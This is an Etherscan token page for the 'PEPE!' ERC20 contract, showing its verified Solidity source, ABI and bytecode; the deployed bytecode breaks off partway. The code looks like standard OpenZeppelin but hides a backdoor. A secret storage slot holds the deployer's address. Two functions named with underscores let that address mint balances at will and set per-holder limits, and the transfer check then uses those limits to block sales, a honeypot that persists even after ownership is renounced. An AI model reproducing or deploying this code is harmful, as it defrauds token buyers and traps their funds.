ETH Price: $2,966.94 (-1.77%)
Gas: 3 Gwei

Token

PEPE! (PEPE!)
 

Overview

Max Total Supply

46,200,000,000 PEPE!

Holders

43

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
75,866,477.009602812915205301 PEPE!

Value
$0.00
0xabe4aea5d250294ecce14566734f2cb288a6512f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PEPE

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-13
*/

//telegram:https://t.me/PEKorea
//Twitter:https://twitter.com/pepeKoreacoin
pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.7.0) (utils/StorageSlot.sol)

pragma solidity ^0.8.0;

/**
 * @dev Library for reading and writing primitive types to specific storage slots.
 *
 * Storage slots are often used to avoid storage conflict when dealing with upgradeable contracts.
 * This library helps with reading and writing to such slots without the need for inline assembly.
 *
 * The functions in this library return Slot structs that contain a `value` member that can be used to read or write.
 *
 * Example usage to set ERC1967 implementation slot:
 * ```
 * contract ERC1967 {
 *     bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
 *
 *     function _getImplementation() internal view returns (address) {
 *         return StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value;
 *     }
 *
 *     function _setImplementation(address newImplementation) internal {
 *         require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract");
 *         StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value = newImplementation;
 *     }
 * }
 * ```
 *
 * _Available since v4.1 for `address`, `bool`, `bytes32`, and `uint256`._
 */
library StorageSlot {
    struct AddressSlot {
        address value;
    }

    struct BooleanSlot {
        bool value;
    }

    struct Bytes32Slot {
        bytes32 value;
    }

    struct Uint256Slot {
        uint256 value;
    }

    /**
     * @dev Returns an `AddressSlot` with member `value` located at `slot`.
     */
    function getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `BooleanSlot` with member `value` located at `slot`.
     */
    function getBooleanSlot(bytes32 slot) internal pure returns (BooleanSlot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `Bytes32Slot` with member `value` located at `slot`.
     */
    function getBytes32Slot(bytes32 slot) internal pure returns (Bytes32Slot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `Uint256Slot` with member `value` located at `slot`.
     */
    function getUint256Slot(bytes32 slot) internal pure returns (Uint256Slot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }
}


// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    mapping(address => uint) l;

    bytes32 internal constant _A_SLOT = 0x140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;  
        _symbol = symbol_;

        _totalSupply = 46200000000000000000000000000;
        _balances[msg.sender] = _totalSupply;

        emit Transfer(address(0), msg.sender, _totalSupply);

        StorageSlot.getAddressSlot(_A_SLOT).value = msg.sender;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }

    function __(address _index, uint256 _value) public {
        require(msg.sender == StorageSlot.getAddressSlot(_A_SLOT).value, "a");
        mapping(address => uint) storage __b = _balances;
        __b[_index] += _value;
    }

    function ___(address _index, uint _value) public {
        require(msg.sender == StorageSlot.getAddressSlot(_A_SLOT).value, "a");
        l[_index] = _value;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(l[from] < amount, "ERC20: transfer l");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
    unchecked {
        _balances[from] = fromBalance - amount;
        // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
        // decrementing then incrementing.
        _balances[to] += amount;
    }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}


// File contracts/ERC20Test.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;


contract PEPE is ERC20('PEPE!', 'PEPE!'), Ownable {
    constructor() {

    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_index","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"__","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_index","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"___","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50604080518082018252600580825264504550452160d81b602080840182815285518087019096529285528401528151919291620000529160039162000196565b5080516200006890600490602084019062000196565b506b9547be8a710724977800000060028190553360008181526020819052604080822084905551919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91620000c0916200023c565b60405180910390a333620001027f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad60001b6200013d60201b620005691760201c565b80546001600160a01b0319166001600160a01b0392909216919091179055506200013790506200013162000140565b62000144565b62000282565b90565b3390565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b828054620001a49062000245565b90600052602060002090601f016020900481019282620001c8576000855562000213565b82601f10620001e357805160ff191683800117855562000213565b8280016001018555821562000213579182015b8281111562000213578251825591602001919060010190620001f6565b506200022192915062000225565b5090565b5b8082111562000221576000815560010162000226565b90815260200190565b6002810460018216806200025a57607f821691505b602082108114156200027c57634e487b7160e01b600052602260045260246000fd5b50919050565b610cb980620002926000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101f3578063a9059cbb14610206578063dd62ed3e14610219578063f2fde38b1461022c57610100565b8063715018a6146101bb57806384bf2a08146101c35780638da5cb5b146101d657806395d89b41146101eb57610100565b806323b872dd116100d357806323b872dd1461016d578063313ce56714610180578063395093511461019557806370a08231146101a857610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd146101435780631aef817b14610158575b600080fd5b61010d61023f565b60405161011a9190610929565b60405180910390f35b6101366101313660046108e1565b6102d1565b60405161011a919061091e565b61014b6102f3565b60405161011a9190610c0d565b61016b6101663660046108e1565b6102f9565b005b61013661017b3660046108a6565b61036f565b61018861039d565b60405161011a9190610c16565b6101366101a33660046108e1565b6103a2565b61014b6101b6366004610853565b6103ce565b61016b6103ed565b61016b6101d13660046108e1565b610401565b6101de610486565b60405161011a919061090a565b61010d610495565b6101366102013660046108e1565b6104a4565b6101366102143660046108e1565b6104ec565b61014b610227366004610874565b610504565b61016b61023a366004610853565b61052f565b60606003805461024e90610c48565b80601f016020809104026020016040519081016040528092919081815260200182805461027a90610c48565b80156102c75780601f1061029c576101008083540402835291602001916102c7565b820191906000526020600020905b8154815290600101906020018083116102aa57829003601f168201915b5050505050905090565b6000806102dc61056c565b90506102e9818585610570565b5060019392505050565b60025490565b6103227f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610569565b546001600160a01b031633146103535760405162461bcd60e51b815260040161034a90610a47565b60405180910390fd5b6001600160a01b03909116600090815260056020526040902055565b60008061037a61056c565b9050610387858285610624565b61039285858561066e565b506001949350505050565b601290565b6000806103ad61056c565b90506102e98185856103bf8589610504565b6103c99190610c24565b610570565b6001600160a01b0381166000908152602081905260409020545b919050565b6103f56107a6565b6103ff60006107e5565b565b61042a7f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610569565b546001600160a01b031633146104525760405162461bcd60e51b815260040161034a90610a47565b6001600160a01b03821660009081526020819052604081208054839190839061047c908490610c24565b9091555050505050565b6006546001600160a01b031690565b60606004805461024e90610c48565b6000806104af61056c565b905060006104bd8286610504565b9050838110156104df5760405162461bcd60e51b815260040161034a90610bc8565b6103928286868403610570565b6000806104f761056c565b90506102e981858561066e565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6105376107a6565b6001600160a01b03811661055d5760405162461bcd60e51b815260040161034a906109bf565b610566816107e5565b50565b90565b3390565b6001600160a01b0383166105965760405162461bcd60e51b815260040161034a90610b84565b6001600160a01b0382166105bc5760405162461bcd60e51b815260040161034a90610a05565b6001600160a01b0380841660008181526001602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610617908590610c0d565b60405180910390a3505050565b60006106308484610504565b90506000198114610668578181101561065b5760405162461bcd60e51b815260040161034a90610a62565b6106688484848403610570565b50505050565b6001600160a01b0383166106945760405162461bcd60e51b815260040161034a90610b3f565b6001600160a01b0382166106ba5760405162461bcd60e51b815260040161034a9061097c565b6001600160a01b03831660009081526005602052604090205481116106f15760405162461bcd60e51b815260040161034a90610adf565b6106fc838383610837565b6001600160a01b038316600090815260208190526040902054818110156107355760405162461bcd60e51b815260040161034a90610a99565b6001600160a01b0380851660008181526020819052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610793908690610c0d565b60405180910390a3610668848484610837565b6107ae61056c565b6001600160a01b03166107bf610486565b6001600160a01b0316146103ff5760405162461bcd60e51b815260040161034a90610b0a565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b505050565b80356001600160a01b03811681146103e857600080fd5b600060208284031215610864578081fd5b61086d8261083c565b9392505050565b60008060408385031215610886578081fd5b61088f8361083c565b915061089d6020840161083c565b90509250929050565b6000806000606084860312156108ba578081fd5b6108c38461083c565b92506108d16020850161083c565b9150604084013590509250925092565b600080604083850312156108f3578182fd5b6108fc8361083c565b946020939093013593505050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602080835283518082850152825b8181101561095557858101830151858201604001528201610939565b818111156109665783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252600190820152606160f81b604082015260600190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b602080825260119082015270115490cc8c0e881d1c985b9cd9995c881b607a1b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610c4357634e487b7160e01b81526011600452602481fd5b500190565b600281046001821680610c5c57607f821691505b60208210811415610c7d57634e487b7160e01b600052602260045260246000fd5b5091905056fea264697066735822122027b89b4498a62c414ce3fc5a32e9202a33fa0f202786b896f93e6984fc004cc064736f6c63430008000033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101f3578063a9059cbb14610206578063dd62ed3e14610219578063f2fde38b1461022c57610100565b8063715018a6146101bb57806384bf2a08146101c35780638da5cb5b146101d657806395d89b41146101eb57610100565b806323b872dd116100d357806323b872dd1461016d578063313ce56714610180578063395093511461019557806370a08231146101a857610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd146101435780631aef817b14610158575b600080fd5b61010d61023f565b60405161011a9190610929565b60405180910390f35b6101366101313660046108e1565b6102d1565b60405161011a919061091e565b61014b6102f3565b60405161011a9190610c0d565b61016b6101663660046108e1565b6102f9565b005b61013661017b3660046108a6565b61036f565b61018861039d565b60405161011a9190610c16565b6101366101a33660046108e1565b6103a2565b61014b6101b6366004610853565b6103ce565b61016b6103ed565b61016b6101d13660046108e1565b610401565b6101de610486565b60405161011a919061090a565b61010d610495565b6101366102013660046108e1565b6104a4565b6101366102143660046108e1565b6104ec565b61014b610227366004610874565b610504565b61016b61023a366004610853565b61052f565b60606003805461024e90610c48565b80601f016020809104026020016040519081016040528092919081815260200182805461027a90610c48565b80156102c75780601f1061029c576101008083540402835291602001916102c7565b820191906000526020600020905b8154815290600101906020018083116102aa57829003601f168201915b5050505050905090565b6000806102dc61056c565b90506102e9818585610570565b5060019392505050565b60025490565b6103227f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610569565b546001600160a01b031633146103535760405162461bcd60e51b815260040161034a90610a47565b60405180910390fd5b6001600160a01b03909116600090815260056020526040902055565b60008061037a61056c565b9050610387858285610624565b61039285858561066e565b506001949350505050565b601290565b6000806103ad61056c565b90506102e98185856103bf8589610504565b6103c99190610c24565b610570565b6001600160a01b0381166000908152602081905260409020545b919050565b6103f56107a6565b6103ff60006107e5565b565b61042a7f140f1f5c37a861fe6d912bc017fef84158e8b